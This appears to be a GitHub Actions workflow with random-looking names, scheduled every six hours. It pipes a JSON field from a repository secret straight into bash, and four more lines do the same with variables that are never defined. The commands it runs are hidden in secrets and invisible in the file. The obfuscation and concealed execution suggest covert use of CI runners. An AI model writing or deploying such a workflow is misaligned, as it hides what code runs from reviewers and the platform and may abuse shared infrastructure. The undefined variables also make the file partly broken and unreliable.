name: yanfeihong5672
on:
  workflow_dispatch:
  schedule:
    - cron: '18 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanfeihong5672
        env:
          lggho6: ${{ secrets.lggho6 }}
        run: |
          echo $lggho6 | jq -r .x53747 | /bin/bash
          echo $ie07 | jq -r .hiyns959 | /bin/bash
          echo $ffaoe863 | jq -r .c76 | /bin/bash
          echo $yz37 | jq -r .s7 | /bin/bash
          echo $oo96978 | jq -r .sqym9220 | /bin/bash

